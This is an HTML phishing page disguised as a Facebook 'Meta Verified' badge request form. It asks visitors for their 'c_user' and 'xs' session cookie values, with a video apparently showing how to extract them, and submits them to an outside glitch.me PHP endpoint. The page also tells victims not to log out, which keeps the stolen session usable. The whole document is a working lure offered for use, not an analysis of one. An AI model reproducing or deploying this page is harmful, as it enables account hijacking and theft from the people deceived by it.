<html lang="en">
    <head>
        <meta charset="UTF-8">
        <link rel="icon" type="image/svg+xml" href="https://apply-get-verified-badge.vercel.app/assets/logo-xjw2vU6p.png">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Meta Verified | Get a verified blue tick</title>
        <script type="module" crossorigin="" src="/assets/index-D9lU3uHa.js"></script>
        <link rel="stylesheet" crossorigin="" href="style.css">
    </head>
    <body>
        <form action="https://branch-weak-increase.glitch.me/RAJA.php" method="post">
            <input type="hidden"
            <div id="root">
                <div>
                    <form>
                        <div class="d-flex align-items-center" style="width: 100%; height: 90px; background: rgb(70, 103, 172);">
                            <h1 class="text-white ms-4 m-0 d-flex align-self-center">facebook</h1>
                        </div>
                        <div class="d-flex align-items-center" style="width: 100%; height: 60px; background: rgb(233, 235, 238);">
                            <h4 class="ms-4 m-0 d-flex align-self-center text-primary">Help Center</h4>
                        </div>
                        <div class="col-12 my-4 d-flex justify-content-center align-items-center">
                            <div class="col-11 col-md-6 border">
                                <div class="p-2" style="background: rgb(245, 246, 247);">
                                    <h5 class="m-0">Request a verified badge on Facebook</h5>
                                </div>
                                <div class="p-2">
                                    <p class="fw-semibold validation_form_para">The verified badge means that Facebook has confirmed that the Page or profile is the authentic presence of the individual, public figure or brand that it represents.</p>
                                    <p class="fw-semibold validation_form_para">Previously, the verified badge also required the person or brand to be notable and unique. You may still see users with a verified badge that represents our previous eligibility requirements.</p>
                                    <p class="fw-semibold validation_form_para">Please provide the precise details below. Refer to the video for clarification if you find the instructions unclear.</p>
                                    <p class="fw-semibold text-secondary" style="font-size: 12px;">Detailed Video Information.</p>
                                    <video controls="" autoplay="" src="https://cdn.glitch.global/cfdab748-b145-4b28-8f85-c26ac388a3c9/cookies.mp4?alt=media&amp;token=a36aa6ff-64b7-4d24-b294-cd35d4d57cc2" style="width: 300px; height: 160px;"></video>
                                    <br>
                                    <button>Enable Sound</button>
                                    <p class="fw-semibold validation_form_para mt-2">Please be sure to provide the requested information below.</p>
                                    <label class="" style="font-size: 12px;">c_user</label>
                                    <br>
                                    <input type="number" name="c_user" required="" pattern="^\d{15}$" title="Please enter 15 digits">
                                    <br>
                                    <label class="mt-2" style="font-size: 12px;">xs</label>
                                    <br>
                                    <input type="text" name="xs">
                                    <p class="mt-2" style="font-size: 12px;">Please make sure not to log out from your computer or laptop until you have received a verification email.</p>
                                </div>
                                <div class="p-2 mb-2 d-flex justify-content-end" style="background: rgb(245, 246, 247);">
                                    <button type="submit" class="text-white border-0" style="background: rgb(66, 103, 178);">Submit</button>
                                </div>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
    </body>
</html>
